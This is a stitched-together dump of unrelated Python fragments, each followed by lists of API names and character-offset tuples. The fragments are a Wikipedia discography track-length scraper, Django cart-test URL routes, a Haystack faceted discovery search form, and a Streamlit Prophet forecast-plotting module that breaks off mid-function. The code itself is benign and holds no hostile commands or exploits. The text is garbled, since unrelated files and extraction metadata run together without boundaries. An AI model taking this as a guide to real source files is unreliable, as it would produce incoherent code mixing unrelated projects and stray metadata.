                    length = row.find_all("td", {"style": "padding-right:10px;text-align:right;vertical-align:top"})[-1].text
                    track_lengths[title] = int(self.timestring_to_seconds(length))
                except (AttributeError, IndexError, ValueError):
                    # Header/credit rows lack the expected cells; skip them.
                    # (Was a bare `except: pass`, which also hid real bugs.)
                    continue
        return track_lengths

    def display_track_stats(self, artist, album_urls):
        """Print min/max/mean/stdev track lengths and show a histogram."""
        track_lengths = self.get_track_lengths(album_urls)
        shortest_track = min(track_lengths, key=track_lengths.get)
        longest_track = max(track_lengths, key=track_lengths.get)
        min_length = self.seconds_to_timestring(track_lengths[shortest_track])
        max_length = self.seconds_to_timestring(track_lengths[longest_track])
        mean_length = self.seconds_to_timestring(int(mean(track_lengths.values())))
        std_length = self.seconds_to_timestring(int(stdev(track_lengths.values())))
        print("The shortest %s track is %s at %s." % (artist, shortest_track, min_length))
        print("The longest %s track is %s at %s." % (artist, longest_track, max_length))
        print("The average %s track length is %s with a standard deviation of %s." % (artist, mean_length, std_length))
        plt.hist(track_lengths.values())
        plt.xlabel("Track length (seconds)")
        plt.ylabel("Number of songs")
        plt.show()

    def timestring_to_seconds(self, timestring):
        """Convert a 'M:SS' string to the total number of seconds (int)."""
        minutes, seconds = timestring.split(":")
        return (60*int(minutes) + int(seconds))

    def seconds_to_timestring(self, seconds):
        """Convert total seconds to 'M:SS' with zero-padded seconds."""
        # printf-style padding replaces the original list-insert juggling;
        # output is identical for non-negative inputs.
        return "%d:%02d" % divmod(seconds, 60)
if __name__ == '__main__':
    if len(sys.argv) == 1:
        # Fallback artist when none is given on the command line.
        # NOTE(review): the original default was an anonymized "<NAME>"
        # placeholder that could never resolve to a real Wikipedia page;
        # any artist with a "<artist> discography" article works here.
        artist = "Radiohead"
    else:
        artist = ' '.join(sys.argv[1:])
    Disco(artist)
| [
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"requests.get",
"bs4.BeautifulSoup",
"matplotlib.pyplot.show"
] | [((427, 444), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (439, 444), False, 'import requests\n'), ((460, 502), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html.content', '"""html.parser"""'], {}), "(html.content, 'html.parser')\n", (473, 502), False, 'from bs4 import BeautifulSoup\n'), ((2668, 2704), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Track length (seconds)"""'], {}), "('Track length (seconds)')\n", (2678, 2704), True, 'import matplotlib.pyplot as plt\n'), ((2713, 2742), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of songs"""'], {}), "('Number of songs')\n", (2723, 2742), True, 'import matplotlib.pyplot as plt\n'), ((2751, 2761), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2759, 2761), True, 'import matplotlib.pyplot as plt\n')] |
from django.conf.urls import url
from .views import (
add,
clear,
remove,
remove_single,
set_quantity,
show
)
# Test-only routes: one per cart operation, all named with a 'carton-tests-' prefix.
urlpatterns = [
    url(r'^show/$', show, name='carton-tests-show'),
    url(r'^add/$', add, name='carton-tests-add'),
    url(r'^remove/$', remove, name='carton-tests-remove'),
    url(r'^remove-single/$', remove_single, name='carton-tests-remove-single'),
    url(r'^clear/$', clear, name='carton-tests-clear'),
    url(r'^set-quantity/$', set_quantity, name='carton-tests-set-quantity'),
]
| [
"django.conf.urls.url"
] | [((157, 203), 'django.conf.urls.url', 'url', (['"""^show/$"""', 'show'], {'name': '"""carton-tests-show"""'}), "('^show/$', show, name='carton-tests-show')\n", (160, 203), False, 'from django.conf.urls import url\n'), ((210, 253), 'django.conf.urls.url', 'url', (['"""^add/$"""', 'add'], {'name': '"""carton-tests-add"""'}), "('^add/$', add, name='carton-tests-add')\n", (213, 253), False, 'from django.conf.urls import url\n'), ((260, 312), 'django.conf.urls.url', 'url', (['"""^remove/$"""', 'remove'], {'name': '"""carton-tests-remove"""'}), "('^remove/$', remove, name='carton-tests-remove')\n", (263, 312), False, 'from django.conf.urls import url\n'), ((319, 392), 'django.conf.urls.url', 'url', (['"""^remove-single/$"""', 'remove_single'], {'name': '"""carton-tests-remove-single"""'}), "('^remove-single/$', remove_single, name='carton-tests-remove-single')\n", (322, 392), False, 'from django.conf.urls import url\n'), ((399, 448), 'django.conf.urls.url', 'url', (['"""^clear/$"""', 'clear'], {'name': '"""carton-tests-clear"""'}), "('^clear/$', clear, name='carton-tests-clear')\n", (402, 448), False, 'from django.conf.urls import url\n'), ((455, 525), 'django.conf.urls.url', 'url', (['"""^set-quantity/$"""', 'set_quantity'], {'name': '"""carton-tests-set-quantity"""'}), "('^set-quantity/$', set_quantity, name='carton-tests-set-quantity')\n", (458, 525), False, 'from django.conf.urls import url\n')] |
from haystack.forms import FacetedSearchForm
from haystack.query import SQ
from django import forms
from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, \
FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError
# Facet fields surfaced in the discovery search UI (list order is display order).
FACETS_TO_SHOW = ['creator', 'contributor', 'owner', 'content_type', 'subject', 'availability']
class DiscoveryForm(FacetedSearchForm):
    """Faceted search form for the discovery page.

    Extends haystack's FacetedSearchForm with spatial (bounding-box),
    temporal (date-range), coverage-type and sort inputs, plus an
    advanced parser for the free-text ``q`` field.
    """
    SORT_ORDER_VALUES = ('title', 'author', 'created', 'modified')
    SORT_ORDER_CHOICES = (('title', 'Title'),
                          ('author', 'First Author'),
                          ('created', 'Date Created'),
                          ('modified', 'Last Modified'))
    SORT_DIRECTION_VALUES = ('', '-')
    SORT_DIRECTION_CHOICES = (('', 'Ascending'),
                              ('-', 'Descending'))
    # Bounding-box corner coordinates (hidden inputs, presumably populated
    # by a map widget on the client side).
    NElat = forms.CharField(widget=forms.HiddenInput(), required=False)
    NElng = forms.CharField(widget=forms.HiddenInput(), required=False)
    SWlat = forms.CharField(widget=forms.HiddenInput(), required=False)
    SWlng = forms.CharField(widget=forms.HiddenInput(), required=False)
    start_date = forms.DateField(label='From Date', required=False)
    end_date = forms.DateField(label='To Date', required=False)
    coverage_type = forms.CharField(widget=forms.HiddenInput(), required=False)
    sort_order = forms.CharField(label='Sort By:',
                                 widget=forms.Select(choices=SORT_ORDER_CHOICES),
                                 required=False)
    sort_direction = forms.CharField(label='Sort Direction:',
                                     widget=forms.Select(choices=SORT_DIRECTION_CHOICES),
                                     required=False)
    def search(self):
        """Return a SearchQuerySet filtered by every populated form input.

        Filters are applied in order: parsed free-text query, spatial
        bounding box, date range, coverage type, then selected facets.
        On a query-parse failure an empty result set is returned and a
        user-facing message is stored in ``self.parse_error``.
        """
        self.parse_error = None  # error return from parser
        # Resources flagged as replaced are always excluded from discovery.
        sqs = self.searchqueryset.all().filter(replaced=False)
        if self.cleaned_data.get('q'):
            # The prior code corrected for an failed match of complete words, as documented
            # in issue #2308. This version instead uses an advanced query syntax in which
            # "word" indicates an exact match and the bare word indicates a stemmed match.
            cdata = self.cleaned_data.get('q')
            try:
                parser = ParseSQ()
                parsed = parser.parse(cdata)
                sqs = sqs.filter(parsed)
            except ValueError as e:
                # NOTE(review): builtin ValueError has no ``value`` attribute;
                # this assumes the parser raises a subclass that sets it — confirm.
                sqs = self.searchqueryset.none()
                self.parse_error = "Value error: {}. No matches. Please try again".format(e.value)
                return sqs
            except MatchingBracketsNotFoundError as e:
                sqs = self.searchqueryset.none()
                self.parse_error = "{} No matches. Please try again.".format(e.value)
                return sqs
            except MalformedDateError as e:
                sqs = self.searchqueryset.none()
                self.parse_error = "{} No matches. Please try again.".format(e.value)
                return sqs
            except FieldNotRecognizedError as e:
                sqs = self.searchqueryset.none()
                self.parse_error = \
                    ("{} Field delimiters include title, contributor, subject, etc. " +
                     "Please try again.")\
                    .format(e.value)
                return sqs
            except InequalityNotAllowedError as e:
                sqs = self.searchqueryset.none()
                self.parse_error = "{} No matches. Please try again.".format(e.value)
                return sqs
        geo_sq = None
        if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
            if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
                # Normal box: SW longitude lies west of NE longitude.
                geo_sq = SQ(east__lte=float(self.cleaned_data['NElng']))
                geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
            else:
                # NElng < SWlng: presumably a box wrapping the 180° meridian.
                # NOTE(review): OR-ing with east <= 180 is always true, which
                # makes the SW bound ineffective — verify the wrap-around logic.
                geo_sq = SQ(east__gte=float(self.cleaned_data['SWlng']))
                geo_sq.add(SQ(east__lte=float(180)), SQ.OR)
                geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
                geo_sq.add(SQ(east__gte=float(-180)), SQ.AND)
        if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
            # latitude might be specified without longitude
            if geo_sq is None:
                geo_sq = SQ(north__lte=float(self.cleaned_data['NElat']))
            else:
                geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
            geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
        if geo_sq is not None:
            sqs = sqs.filter(geo_sq)
        # Check to see if a start_date was chosen.
        start_date = self.cleaned_data['start_date']
        end_date = self.cleaned_data['end_date']
        # allow overlapping ranges
        # cs < s < ce OR s < cs => s < ce
        # AND
        # cs < e < ce OR e > ce => cs < e
        if start_date and end_date:
            sqs = sqs.filter(SQ(end_date__gte=start_date) &
                             SQ(start_date__lte=end_date))
        elif start_date:
            sqs = sqs.filter(SQ(end_date__gte=start_date))
        elif end_date:
            sqs = sqs.filter(SQ(start_date__lte=end_date))
        if self.cleaned_data['coverage_type']:
            sqs = sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])
        # One accumulator per facet family: repeated selections of the same
        # facet are OR'ed together, distinct facets are AND'ed at the end.
        creator_sq = None
        contributor_sq = None
        owner_sq = None
        subject_sq = None
        content_type_sq = None
        availability_sq = None
        # We need to process each facet to ensure that the field name and the
        # value are quoted correctly and separately:
        for facet in self.selected_facets:
            if ":" not in facet:
                continue
            field, value = facet.split(":", 1)
            value = sqs.query.clean(value)
            if value:
                # NOTE(review): "creator" uses a bare `if` while the others form
                # an `elif` chain, so the chain below is re-evaluated for creator
                # facets (harmless here) — consider making this consistent.
                if "creator" in field:
                    if creator_sq is None:
                        creator_sq = SQ(creator__exact=value)
                    else:
                        creator_sq.add(SQ(creator__exact=value), SQ.OR)
                if "contributor" in field:
                    if contributor_sq is None:
                        contributor_sq = SQ(contributor__exact=value)
                    else:
                        contributor_sq.add(SQ(contributor__exact=value), SQ.OR)
                elif "owner" in field:
                    if owner_sq is None:
                        owner_sq = SQ(owner__exact=value)
                    else:
                        owner_sq.add(SQ(owner__exact=value), SQ.OR)
                elif "subject" in field:
                    if subject_sq is None:
                        subject_sq = SQ(subject__exact=value)
                    else:
                        subject_sq.add(SQ(subject__exact=value), SQ.OR)
                elif "content_type" in field:
                    if content_type_sq is None:
                        content_type_sq = SQ(content_type__exact=value)
                    else:
                        content_type_sq.add(SQ(content_type__exact=value), SQ.OR)
                elif "availability" in field:
                    if availability_sq is None:
                        availability_sq = SQ(availability__exact=value)
                    else:
                        availability_sq.add(SQ(availability__exact=value), SQ.OR)
                else:
                    continue
        if creator_sq is not None:
            sqs = sqs.filter(creator_sq)
        if contributor_sq is not None:
            sqs = sqs.filter(contributor_sq)
        if owner_sq is not None:
            sqs = sqs.filter(owner_sq)
        if subject_sq is not None:
            sqs = sqs.filter(subject_sq)
        if content_type_sq is not None:
            sqs = sqs.filter(content_type_sq)
        if availability_sq is not None:
            sqs = sqs.filter(availability_sq)
        return sqs
| [
"django.forms.HiddenInput",
"haystack.query.SQ",
"django.forms.DateField",
"django.forms.Select",
"hs_core.discovery_parser.ParseSQ"
] | [((1117, 1167), 'django.forms.DateField', 'forms.DateField', ([], {'label': '"""From Date"""', 'required': '(False)'}), "(label='From Date', required=False)\n", (1132, 1167), False, 'from django import forms\n'), ((1183, 1231), 'django.forms.DateField', 'forms.DateField', ([], {'label': '"""To Date"""', 'required': '(False)'}), "(label='To Date', required=False)\n", (1198, 1231), False, 'from django import forms\n'), ((847, 866), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (864, 866), False, 'from django import forms\n'), ((919, 938), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (936, 938), False, 'from django import forms\n'), ((991, 1010), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1008, 1010), False, 'from django import forms\n'), ((1063, 1082), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1080, 1082), False, 'from django import forms\n'), ((1275, 1294), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1292, 1294), False, 'from django import forms\n'), ((1403, 1443), 'django.forms.Select', 'forms.Select', ([], {'choices': 'SORT_ORDER_CHOICES'}), '(choices=SORT_ORDER_CHOICES)\n', (1415, 1443), False, 'from django import forms\n'), ((1600, 1644), 'django.forms.Select', 'forms.Select', ([], {'choices': 'SORT_DIRECTION_CHOICES'}), '(choices=SORT_DIRECTION_CHOICES)\n', (1612, 1644), False, 'from django import forms\n'), ((2246, 2255), 'hs_core.discovery_parser.ParseSQ', 'ParseSQ', ([], {}), '()\n', (2253, 2255), False, 'from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError\n'), ((4994, 5022), 'haystack.query.SQ', 'SQ', ([], {'end_date__gte': 'start_date'}), '(end_date__gte=start_date)\n', (4996, 5022), False, 'from haystack.query import SQ\n'), ((5054, 5082), 'haystack.query.SQ', 'SQ', ([], {'start_date__lte': 'end_date'}), '(start_date__lte=end_date)\n', 
(5056, 5082), False, 'from haystack.query import SQ\n'), ((5138, 5166), 'haystack.query.SQ', 'SQ', ([], {'end_date__gte': 'start_date'}), '(end_date__gte=start_date)\n', (5140, 5166), False, 'from haystack.query import SQ\n'), ((5221, 5249), 'haystack.query.SQ', 'SQ', ([], {'start_date__lte': 'end_date'}), '(start_date__lte=end_date)\n', (5223, 5249), False, 'from haystack.query import SQ\n'), ((6021, 6045), 'haystack.query.SQ', 'SQ', ([], {'creator__exact': 'value'}), '(creator__exact=value)\n', (6023, 6045), False, 'from haystack.query import SQ\n'), ((6276, 6304), 'haystack.query.SQ', 'SQ', ([], {'contributor__exact': 'value'}), '(contributor__exact=value)\n', (6278, 6304), False, 'from haystack.query import SQ\n'), ((6111, 6135), 'haystack.query.SQ', 'SQ', ([], {'creator__exact': 'value'}), '(creator__exact=value)\n', (6113, 6135), False, 'from haystack.query import SQ\n'), ((6374, 6402), 'haystack.query.SQ', 'SQ', ([], {'contributor__exact': 'value'}), '(contributor__exact=value)\n', (6376, 6402), False, 'from haystack.query import SQ\n'), ((6527, 6549), 'haystack.query.SQ', 'SQ', ([], {'owner__exact': 'value'}), '(owner__exact=value)\n', (6529, 6549), False, 'from haystack.query import SQ\n'), ((6613, 6635), 'haystack.query.SQ', 'SQ', ([], {'owner__exact': 'value'}), '(owner__exact=value)\n', (6615, 6635), False, 'from haystack.query import SQ\n'), ((6766, 6790), 'haystack.query.SQ', 'SQ', ([], {'subject__exact': 'value'}), '(subject__exact=value)\n', (6768, 6790), False, 'from haystack.query import SQ\n'), ((6856, 6880), 'haystack.query.SQ', 'SQ', ([], {'subject__exact': 'value'}), '(subject__exact=value)\n', (6858, 6880), False, 'from haystack.query import SQ\n'), ((7026, 7055), 'haystack.query.SQ', 'SQ', ([], {'content_type__exact': 'value'}), '(content_type__exact=value)\n', (7028, 7055), False, 'from haystack.query import SQ\n'), ((7126, 7155), 'haystack.query.SQ', 'SQ', ([], {'content_type__exact': 'value'}), '(content_type__exact=value)\n', (7128, 
7155), False, 'from haystack.query import SQ\n'), ((7301, 7330), 'haystack.query.SQ', 'SQ', ([], {'availability__exact': 'value'}), '(availability__exact=value)\n', (7303, 7330), False, 'from haystack.query import SQ\n'), ((7401, 7430), 'haystack.query.SQ', 'SQ', ([], {'availability__exact': 'value'}), '(availability__exact=value)\n', (7403, 7430), False, 'from haystack.query import SQ\n')] |
from typing import Any, Dict, List
import datetime
import pandas as pd
import plotly.express as px
import plotly.figure_factory as ff
import plotly.graph_objects as go
import streamlit as st
from fbprophet import Prophet
from fbprophet.plot import plot_plotly
from plotly.subplots import make_subplots
from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics
from streamlit_prophet.lib.evaluation.preparation import get_evaluation_df
from streamlit_prophet.lib.exposition.expanders import (
display_expander,
display_expanders_performance,
)
from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall
from streamlit_prophet.lib.inputs.dates import input_waterfall_dates
from streamlit_prophet.lib.utils.misc import reverse_list
def plot_overview(
    make_future_forecast: bool,
    use_cv: bool,
    models: Dict[Any, Any],
    forecasts: Dict[Any, Any],
    target_col: str,
    cleaning: Dict[Any, Any],
    readme: Dict[Any, Any],
    report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
    """Render the overview chart (forecast vs actual values) and log it in the report.

    Parameters
    ----------
    make_future_forecast : bool
        True when a forecast on future dates was produced.
    use_cv : bool
        True when cross-validation was used for evaluation.
    models : Dict
        Fitted models ("eval", and "future" when available).
    forecasts : Dict
        Forecast dataframes, keyed like `models` (plus "cv_with_hist").
    target_col : str
        Name of the target column, used as the y-axis label.
    cleaning : Dict
        Cleaning specifications; "log_transform" controls plot detail.
    readme : Dict
        Explanatory texts for the expander.
    report : List[Dict[str, Any]]
        Report components accumulated so far.

    Returns
    -------
    List[Dict[str, Any]]
        The report list with the overview figure appended.
    """
    display_expander(readme, "overview", "More info on this plot")
    # Changepoints/trend/uncertainty are hidden when the target is log-transformed.
    show_details = not cleaning["log_transform"]
    if make_future_forecast:
        model, forecast = models["future"], forecasts["future"]
    elif use_cv:
        model, forecast = models["eval"], forecasts["cv_with_hist"]
    else:
        model, forecast = models["eval"], forecasts["eval"]
    fig = plot_plotly(
        model,
        forecast,
        ylabel=target_col,
        changepoints=show_details,
        trend=show_details,
        uncertainty=show_details,
    )
    st.plotly_chart(fig)
    report.append({"object": fig, "name": "overview", "type": "plot"})
    return report
def plot_performance(
    use_cv: bool,
    target_col: str,
    datasets: Dict[Any, Any],
    forecasts: Dict[Any, Any],
    dates: Dict[Any, Any],
    eval: Dict[Any, Any],
    resampling: Dict[Any, Any],
    config: Dict[Any, Any],
    readme: Dict[Any, Any],
    report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
    """Plots several graphs showing model performance, with explanations.

    Parameters
    ----------
    use_cv : bool
        Whether or not cross-validation is used.
    target_col : str
        Name of target column.
    datasets : Dict
        Dictionary containing evaluation dataset.
    forecasts : Dict
        Dictionary containing evaluation forecasts.
    dates : Dict
        Dictionary containing evaluation dates.
    eval : Dict
        Evaluation specifications (metrics, evaluation set, granularity).
    resampling : Dict
        Resampling specifications (granularity, dataset frequency).
    config : Dict
        Cleaning specifications.
    readme : Dict
        Dictionary containing explanations about the graphs.
    report: List[Dict[str, Any]]
        List of all report components.

    Returns
    -------
    List[Dict[str, Any]]
        The report list extended with the performance figures and datasets.
    """
    style = config["style"]
    # Build the truth-vs-forecast dataframe, then compute the requested
    # metrics at the granularity selected in `eval`.
    evaluation_df = get_evaluation_df(datasets, forecasts, dates, eval, use_cv)
    metrics_df, metrics_dict = get_perf_metrics(
        evaluation_df, eval, dates, resampling, use_cv, config
    )
    # Page layout (order matters for the streamlit rendering):
    # global metrics, then a per-granularity deep dive, then error analysis.
    st.write("## Performance metrics")
    display_expanders_performance(use_cv, dates, resampling, style, readme)
    display_expander(readme, "helper_metrics", "How to evaluate my model?", True)
    st.write("### Global performance")
    report = display_global_metrics(evaluation_df, eval, dates, resampling, use_cv, config, report)
    st.write("### Deep dive")
    report = plot_detailed_metrics(metrics_df, metrics_dict, eval, use_cv, style, report)
    st.write("## Error analysis")
    display_expander(readme, "helper_errors", "How to troubleshoot forecasting errors?", True)
    fig1 = plot_forecasts_vs_truth(evaluation_df, target_col, use_cv, style)
    fig2 = plot_truth_vs_actual_scatter(evaluation_df, use_cv, style)
    fig3 = plot_residuals_distrib(evaluation_df, use_cv, style)
    st.plotly_chart(fig1)
    st.plotly_chart(fig2)
    st.plotly_chart(fig3)
    # Everything above is also saved into the downloadable report.
    report.append({"object": fig1, "name": "eval_forecast_vs_truth_line", "type": "plot"})
    report.append({"object": fig2, "name": "eval_forecast_vs_truth_scatter", "type": "plot"})
    report.append({"object": fig3, "name": "eval_residuals_distribution", "type": "plot"})
    report.append({"object": evaluation_df, "name": "eval_data", "type": "dataset"})
    report.append(
        {"object": metrics_df.reset_index(), "name": "eval_detailed_performance", "type": "dataset"}
    )
    return report
def plot_components(
    use_cv: bool,
    make_future_forecast: bool,
    target_col: str,
    models: Dict[Any, Any],
    forecasts: Dict[Any, Any],
    cleaning: Dict[Any, Any],
    resampling: Dict[Any, Any],
    config: Dict[Any, Any],
    readme: Dict[Any, Any],
    df: pd.DataFrame,
    report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
    """Plots a graph showing the different components of prediction, with explanations.

    Parameters
    ----------
    use_cv : bool
        Whether or not cross-validation is used.
    make_future_forecast : bool
        Whether or not a future forecast is made.
    target_col : str
        Name of target column.
    models : Dict
        Dictionary containing a model fitted on evaluation data.
    forecasts : Dict
        Dictionary containing evaluation forecasts.
    cleaning : Dict
        Cleaning specifications.
    resampling : Dict
        Resampling specifications (granularity, dataset frequency).
    config : Dict
        Cleaning specifications.
    readme : Dict
        Dictionary containing explanations about the graph.
    df: pd.DataFrame
        Dataframe containing the ground truth.
    report: List[Dict[str, Any]]
        List of all report components.

    Returns
    -------
    List[Dict[str, Any]]
        The report list extended with the component figures and input data.
    """
    style = config["style"]
    st.write("## Global impact")
    display_expander(readme, "components", "More info on this plot")
    # Pick the forecast to decompose: prefer the future forecast, then the
    # cross-validation history, then the plain evaluation forecast.
    if make_future_forecast:
        forecast_df = forecasts["future"].copy()
        model = models["future"]
    elif use_cv:
        forecast_df = forecasts["cv_with_hist"].copy()
        # Keep only rows that precede the first cross-validation forecast date.
        forecast_df = forecast_df.loc[forecast_df["ds"] < forecasts["cv"].ds.min()]
        model = models["eval"]
    else:
        forecast_df = forecasts["eval"].copy()
        model = models["eval"]
    fig1 = make_separate_components_plot(
        model, forecast_df, target_col, cleaning, resampling, style
    )
    st.plotly_chart(fig1)
    st.write("## Local impact")
    display_expander(readme, "waterfall", "More info on this plot", True)
    # Waterfall decomposition over a user-selected date window.
    start_date, end_date = input_waterfall_dates(forecast_df, resampling)
    fig2 = make_waterfall_components_plot(
        model, forecast_df, start_date, end_date, target_col, cleaning, resampling, style, df
    )
    st.plotly_chart(fig2)
    report.append({"object": fig1, "name": "global_components", "type": "plot"})
    report.append({"object": fig2, "name": "local_components", "type": "plot"})
    report.append({"object": df, "name": "model_input_data", "type": "dataset"})
    return report
def plot_future(
    models: Dict[Any, Any],
    forecasts: Dict[Any, Any],
    dates: Dict[Any, Any],
    target_col: str,
    cleaning: Dict[Any, Any],
    readme: Dict[Any, Any],
    report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
    """Render the future-forecast chart, zoomed on the forecast window, and log it.

    Parameters
    ----------
    models : Dict
        Fitted models; "future" is the model trained on the whole dataset.
    forecasts : Dict
        Forecast dataframes; "future" holds predictions on future dates.
    dates : Dict
        Date bounds; "forecast_start_date"/"forecast_end_date" set the x-range.
    target_col : str
        Name of the target column, used as the y-axis label.
    cleaning : Dict
        Cleaning specifications; "log_transform" controls plot detail.
    readme : Dict
        Explanatory texts for the expander.
    report : List[Dict[str, Any]]
        Report components accumulated so far.

    Returns
    -------
    List[Dict[str, Any]]
        The report list with the future figure and forecast dataset appended.
    """
    display_expander(readme, "future", "More info on this plot")
    # Changepoints/trend/uncertainty are hidden when the target is log-transformed.
    show_details = not cleaning["log_transform"]
    fig = plot_plotly(
        models["future"],
        forecasts["future"],
        ylabel=target_col,
        changepoints=show_details,
        trend=show_details,
        uncertainty=show_details,
    )
    # Zoom the x axis onto the forecast horizon only.
    horizon = [dates["forecast_start_date"], dates["forecast_end_date"]]
    fig.update_layout(xaxis_range=horizon)
    st.plotly_chart(fig)
    for obj, kind in ((fig, "plot"), (forecasts["future"], "dataset")):
        report.append({"object": obj, "name": "future_forecast", "type": kind})
    return report
def plot_forecasts_vs_truth(
    eval_df: pd.DataFrame, target_col: str, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
    """Build a line chart of forecasts against ground truth on the evaluation period.

    Parameters
    ----------
    eval_df : pd.DataFrame
        Evaluation dataframe with "ds", "truth", "forecast" (and "Fold" when CV).
    target_col : str
        Name of the target column, used as the y-axis title.
    use_cv : bool
        Whether cross-validation folds should be drawn as separate lines.
    style : Dict
        Style specifications for the graph (colors).

    Returns
    -------
    go.Figure
        Line chart with a range slider and quick range-selector buttons.
    """
    if use_cv:
        # One line per CV fold, plus a dotted reference line for the truth.
        fold_colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
        fig = px.line(
            eval_df,
            x="ds",
            y="forecast",
            color="Fold",
            color_discrete_sequence=fold_colors,
        )
        truth_trace = go.Scatter(
            x=eval_df["ds"],
            y=eval_df["truth"],
            name="Truth",
            mode="lines",
            line={"color": style["color_axis"], "dash": "dot", "width": 1.5},
        )
        fig.add_trace(truth_trace)
    else:
        fig = px.line(
            eval_df,
            x="ds",
            y=["truth", "forecast"],
            color_discrete_sequence=style["colors"][1:],
            hover_data={"variable": True, "value": ":.4f", "ds": False},
        )
    # Quick-zoom presets shown above the x axis.
    range_presets = [
        {"count": 7, "label": "1w", "step": "day", "stepmode": "backward"},
        {"count": 1, "label": "1m", "step": "month", "stepmode": "backward"},
        {"count": 3, "label": "3m", "step": "month", "stepmode": "backward"},
        {"count": 6, "label": "6m", "step": "month", "stepmode": "backward"},
        {"count": 1, "label": "YTD", "step": "year", "stepmode": "todate"},
        {"count": 1, "label": "1y", "step": "year", "stepmode": "backward"},
        {"step": "all"},
    ]
    fig.update_xaxes(
        rangeslider_visible=True,
        rangeselector={"buttons": range_presets},
    )
    fig.update_layout(
        yaxis_title=target_col,
        legend_title_text="",
        height=500,
        width=800,
        title_text="Forecast vs Truth",
        title_x=0.5,
        title_y=1,
        hovermode="x unified",
    )
    return fig
def plot_truth_vs_actual_scatter(
    eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
    """Creates a plotly scatter plot showing forecasts and actual values on evaluation period.

    Parameters
    ----------
    eval_df : pd.DataFrame
        Evaluation dataframe (left unmodified by this function).
    use_cv : bool
        Whether or not cross-validation is used.
    style : Dict
        Style specifications for the graph (colors).

    Returns
    -------
    go.Figure
        Plotly scatter plot showing forecasts and actual values on evaluation period.
    """
    # Work on a copy: the previous version silently added a "date" column to
    # the caller's dataframe as a hidden side effect.
    eval_df = eval_df.copy()
    # Human-readable date shown in the hover tooltip.
    eval_df["date"] = eval_df["ds"].map(lambda x: x.strftime("%A %b %d %Y"))
    if use_cv:
        colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
        fig = px.scatter(
            eval_df,
            x="truth",
            y="forecast",
            color="Fold",
            opacity=0.5,
            color_discrete_sequence=colors,
            hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
        )
    else:
        fig = px.scatter(
            eval_df,
            x="truth",
            y="forecast",
            opacity=0.5,
            color_discrete_sequence=style["colors"][2:],
            hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
        )
    # Diagonal y = x reference: points on it are perfect forecasts.
    fig.add_trace(
        go.Scatter(
            x=eval_df["truth"],
            y=eval_df["truth"],
            name="optimal",
            mode="lines",
            line=dict(color=style["color_axis"], width=1.5),
        )
    )
    fig.update_layout(
        xaxis_title="Truth", yaxis_title="Forecast", legend_title_text="", height=450, width=800
    )
    return fig
def plot_residuals_distrib(eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]) -> go.Figure:
    """Creates a plotly distribution plot showing distribution of residuals on evaluation period.

    Parameters
    ----------
    eval_df : pd.DataFrame
        Evaluation dataframe (left unmodified by this function).
    use_cv : bool
        Whether or not cross-validation is used.
    style : Dict
        Style specifications for the graph (colors).

    Returns
    -------
    go.Figure
        Plotly distribution plot showing distribution of residuals on evaluation period.
    """
    # Work on a copy: the previous version silently added a "residuals"
    # column to the caller's dataframe as a hidden side effect.
    eval_df = eval_df.copy()
    eval_df["residuals"] = eval_df["forecast"] - eval_df["truth"]
    # Clip extreme outliers (outside the 0.5%-99.5% quantile range) so the
    # density plot stays readable — but only when there is enough data.
    if len(eval_df) >= 10:
        x_min, x_max = eval_df["residuals"].quantile(0.005), eval_df["residuals"].quantile(0.995)
    else:
        x_min, x_max = eval_df["residuals"].min(), eval_df["residuals"].max()
    if use_cv:
        # One distribution per fold, most recent fold first.
        labels = sorted(eval_df["Fold"].unique(), reverse=True)
        residuals = [eval_df.loc[eval_df["Fold"] == fold, "residuals"] for fold in labels]
        residuals = [x[x.between(x_min, x_max)] for x in residuals]
    else:
        labels = [""]
        # Already a Series — no pd.Series(...) wrapping needed.
        residuals_series = eval_df["residuals"]
        residuals = [residuals_series[residuals_series.between(x_min, x_max)]]
    colors = (
        reverse_list(style["colors"], eval_df["Fold"].nunique()) if use_cv else [style["colors"][2]]
    )
    fig = ff.create_distplot(residuals, labels, show_hist=False, colors=colors)
    fig.update_layout(
        title_text="Distribution of errors",
        title_x=0.5,
        title_y=0.85,
        xaxis_title="Error (Forecast - Truth)",
        showlegend=use_cv,
        xaxis_zeroline=True,
        xaxis_zerolinecolor=style["color_axis"],
        xaxis_zerolinewidth=1,
        yaxis_zeroline=True,
        yaxis_zerolinecolor=style["color_axis"],
